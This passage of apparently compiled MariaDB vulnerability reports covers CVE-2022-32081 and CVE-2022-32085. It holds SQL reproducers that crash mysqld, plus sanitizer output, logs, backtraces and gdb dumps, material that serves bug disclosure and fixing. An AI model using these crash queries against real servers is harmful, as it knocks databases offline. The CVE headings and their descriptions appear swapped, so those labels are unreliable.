    #4 0x55a3170ecb3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55a3170f87b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55a3170f936f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55a3170fca52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7f4811f17b24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/field.h:1395 in prepare\_inplace\_add\_virtual

Shadow bytes around the buggy address:

  0x0c3280012d50: f7 f7 fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d80: f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d90: 00 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00

\=>0x0c3280012da0: 00 00 00 00 00 00 00 00 00 00 00 f7\[f7\]f7 f7 f7

  0x0c3280012db0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dc0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dd0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012de0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012df0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2119277==ABORTING

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

(gdb) (gdb) (gdb) quit

CVE-2022-32081: [MDEV-26420] use-after-poison in Storage - Jira

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Item_func_in::cleanup/Item::cleanup_processor.

CREATE TABLE v0 ( v1 VARCHAR ( 65 ) CHAR SET ASCII NULL DEFAULT ( 'x' IN ( 'x' , CURRENT\_USER ) ) ) ;

 START TRANSACTION READ WRITE ;

 INSERT INTO v0 VALUES ( v1 ) ;

 SELECT HEX ( GREATEST ( v1 , ( 'x' ) ) ) FROM v0 ;

 INSERT INTO v0 VALUES ( REPEAT ( ( NULL + 84551986.000000 ) = 74599462.000000 , ( HEX ( 18069096.000000 ) ) / -1 = 28 ) ) ;

 DESCRIBE SELECT v0 . v1 FROM v0 , v0 WHERE v0 . v1 = v0 . v1 ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 15:00:28 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 15:00:28 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 15:00:28 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 15:00:28 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 15:00:28 0 \[Note\] InnoDB: Using liburing

2021-08-16 15:00:28 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 15:00:28 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 15:00:39 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 15:00:39 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 15:00:39 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 15:00:39 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 15:00:39 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 15:00:39 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/9/ib\_buffer\_pool

2021-08-16 15:00:39 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 15:00:40 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 15:00:40 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 15:00:40 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 15:00:40

2021-08-16 15:00:41 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/9.socket'  port: 10009  Source distribution

210816 15:00:43 \[ERROR\] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f987ba5b850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f989b307c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55bb57c35747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55bb56bfd120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f989acf1870\]

sql/item\_cmpfunc.h:2556(Item\_func\_in::cleanup())\[0x55bb561f90ee\]

sql/item.cc:574(Item::cleanup\_processor(void\*))\[0x55bb56c4adbc\]

sql/item.h:5439(Item\_func\_or\_sum::walk(bool (Item::\*)(void\*), bool, void\*))\[0x55bb561fb774\]

sql/table.cc:3616(fix\_session\_vcol\_expr(THD\*, Virtual\_column\_info\*))\[0x55bb567afd3a\]

sql/sql\_base.cc:5433(TABLE::fix\_vcol\_exprs(THD\*))\[0x55bb5632124f\]

sql/sql\_base.cc:5467(lock\_tables(THD\*, TABLE\_LIST\*, unsigned int, unsigned int))\[0x55bb56321f93\]

sql/sql\_base.cc:5261(open\_and\_lock\_tables(THD\*, DDL\_options\_st const&, TABLE\_LIST\*, bool, unsigned int, Prelocking\_strategy\*))\[0x55bb56326800\]

sql/sql\_base.h:397(open\_and\_lock\_tables(THD\*, TABLE\_LIST\*, bool, unsigned int))\[0x55bb563dcef4\]

sql/sql\_parse.cc:4565(mysql\_execute\_command(THD\*, bool))\[0x55bb56495bb8\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55bb564a25a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55bb564a860c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55bb564ad73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55bb56868e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55bb5686933d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55bb572f9c2c\]

pthread\_create.c:0(start\_thread)\[0x7f989ace7259\]

:0(\_\_GI\_\_\_clone)\[0x7f989a8925e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 VALUES ( REPEAT ( ( NULL + 84551986.000000 ) = 74599462.000000 , ( HEX ( 18069096.000000 ) ) / -1 = 28 ) )

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/9

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

\[New LWP 321844\]

\[New LWP 272301\]

\[New LWP 315980\]

\[New LWP 272464\]

\[New LWP 272465\]

\[New LWP 272438\]

\[New LWP 313382\]

\[New LWP 313342\]

\[New LWP 315981\]

\[New LWP 315984\]

\[New LWP 315982\]

\[New LWP 321828\]

\[New LWP 331506\]

\[New LWP 331509\]

\[New LWP 272143\]

\[New LWP 315983\]

\[Thread debugging using libthread\_db enabled\]

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10009 --datadir=/home/fuboat/mariadb-tmp/9'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0x00007f989acee808 in pthread\_kill () from /usr/lib/libpthread.so.0

\[Current thread is 1 (Thread 0x7f987ba5c240 (LWP 321844))\]

(gdb) (gdb) #0  0x00007f989acee808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055bb56bfd06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x000055bb561f90ee in Item\_func\_in::cleanup (this=0x6190000a3dd8) at /experiment/mariadb-server/sql/item\_cmpfunc.h:2556

#4  0x000055bb56c4adbc in Item::cleanup\_processor (arg=<optimized out>, this=<optimized out>) at /experiment/mariadb-server/sql/item.cc:572

#5  Item::cleanup\_processor (this=<optimized out>, arg=<optimized out>) at /experiment/mariadb-server/sql/item.cc:569

#6  0x000055bb561fb774 in Item\_func\_or\_sum::walk (this=0x6190000a3dd8, processor=<optimized out>, walk\_subquery=<optimized out>, arg=0x0) at /experiment/mariadb-server/sql/item.h:5439

#7  0x000055bb567afd3a in fix\_session\_vcol\_expr (vcol=0x6190000a3f58, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/table.cc:3614

#8  fix\_session\_vcol\_expr (thd=0x62b0000bd218, vcol=0x6190000a3f58) at /experiment/mariadb-server/sql/table.cc:3608

#9  0x000055bb5632124f in TABLE::fix\_vcol\_exprs (thd=0x62b0000bd218, this=0x6190000a3298) at /experiment/mariadb-server/sql/sql\_base.cc:5434

#10 TABLE::fix\_vcol\_exprs (this=0x6190000a3298, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5426

#11 0x000055bb56321f93 in fix\_all\_session\_vcol\_exprs (tables=0x629000087408, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5465

#12 lock\_tables (thd=thd@entry=0x62b0000bd218, tables=0x629000087408, count=<optimized out>, flags=flags@entry=0) at /experiment/mariadb-server/sql/sql\_base.cc:5649

#13 0x000055bb56326800 in open\_and\_lock\_tables (thd=thd@entry=0x62b0000bd218, options=..., tables=<optimized out>, tables@entry=0x629000087408, derived=derived@entry=true, flags=flags@entry=0, prelocking\_strategy=prelocking\_strategy@entry=0x7f987ba592d0) at /experiment/mariadb-server/sql/sql\_base.cc:5261

#14 0x000055bb563dcef4 in open\_and\_lock\_tables (flags=0, derived=true, tables=0x629000087408, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.h:509

#15 mysql\_insert (thd=thd@entry=0x62b0000bd218, table\_list=0x629000087408, fields=..., values\_list=..., update\_fields=..., update\_values=..., duplic=<optimized out>, ignore=<optimized out>, result=<optimized out>) at /experiment/mariadb-server/sql/sql\_insert.cc:757

#16 0x000055bb56495bb8 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4565

#17 0x000055bb564a25a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#18 0x000055bb564a860c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#19 0x000055bb564ad73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#20 0x000055bb56868e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#21 0x000055bb5686933d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#22 0x000055bb572f9c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#23 0x00007f989ace7259 in start\_thread () from /usr/lib/libpthread.so.0

#24 0x00007f989a8925e3 in clone () from /usr/lib/libc.so.6

(gdb) quit

CVE-2022-32085: [MDEV-26407] Server crashes in Item_func_in::cleanup/Item::cleanup_processor

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort.

CREATE TABLE v0 ( v1 TINYINT NULL ) ;

 TRUNCATE TABLE v0 ;

 SELECT instr ( COALESCE ( sqrt ( ( quote ( 'x' / 46 ) ) + 0 ) , 'x' ) , 51 ) ;

 SAVEPOINT v0 ;

 SELECT 16 / 'x' AS v2 UNION SELECT -2147483648 AS v3 ORDER BY ( LAST\_VALUE ( 'x' ) OVER ( ) ) LIMIT 6 ;

 REPLACE INTO v0 VALUES ( TRUE ) ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 15:01:54 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 15:01:54 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 15:01:54 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 15:01:54 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 15:01:54 0 \[Note\] InnoDB: Using liburing

2021-08-16 15:01:54 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 15:01:54 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 15:02:07 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 15:02:07 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 15:02:07 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 15:02:07 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 15:02:07 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 15:02:07 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/4/ib\_buffer\_pool

2021-08-16 15:02:07 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 15:02:07 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 15:02:07 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 15:02:08 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 15:02:08

2021-08-16 15:02:09 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/4.socket'  port: 10004  Source distribution

210816 15:02:10 \[ERROR\] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f625c527850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f627bdd3c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55cd04b35747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55cd03afd120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f627b7bd870\]

sql/sql\_analyze\_stmt.h:89(Exec\_time\_tracker::get\_loops() const)\[0x55cd03af5195\]

sql/sql\_select.cc:24388(create\_sort\_index(THD\*, JOIN\*, st\_join\_table\*, Filesort\*))\[0x55cd034dc699\]

sql/sql\_window.cc:3007(Window\_funcs\_sort::exec(JOIN\*, bool))\[0x55cd03935d79\]

sql/sql\_window.cc:3140(Window\_funcs\_computation::exec(JOIN\*, bool))\[0x55cd03938435\]

sql/sql\_select.cc:29457(AGGR\_OP::end\_send())\[0x55cd0350fc76\]

sql/sql\_select.cc:20766(sub\_select\_postjoin\_aggr(JOIN\*, st\_join\_table\*, bool))\[0x55cd035105d0\]

sql/sql\_select.cc:20604(JOIN::exec\_inner())\[0x55cd0353482c\]

sql/sql\_select.cc:4514(JOIN::exec())\[0x55cd03536593\]

sql/sql\_select.cc:4993(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x55cd0352eb5b\]

sql/sql\_union.cc:2360(st\_select\_lex\_unit::exec())\[0x55cd0365117f\]

sql/sql\_union.cc:43(mysql\_union(THD\*, LEX\*, select\_result\*, st\_select\_lex\_unit\*, unsigned long))\[0x55cd0365d7b8\]

sql/sql\_class.h:4325(THD::is\_error() const)\[0x55cd035303a0\]

sql/sql\_parse.cc:6256(execute\_sqlcom\_select(THD\*, TABLE\_LIST\*))\[0x55cd03373d7d\]

sql/sql\_parse.cc:3946(mysql\_execute\_command(THD\*, bool))\[0x55cd0339d421\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55cd033a25a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55cd033a860c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55cd033ad73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55cd03768e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55cd0376933d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55cd041f9c2c\]

pthread\_create.c:0(start\_thread)\[0x7f627b7b3259\]

:0(\_\_GI\_\_\_clone)\[0x7f627b35e5e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): SELECT 16 / 'x' AS v2 UNION SELECT -2147483648 AS v3 ORDER BY ( LAST\_VALUE ( 'x' ) OVER ( ) ) LIMIT 6

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/4

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us      

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

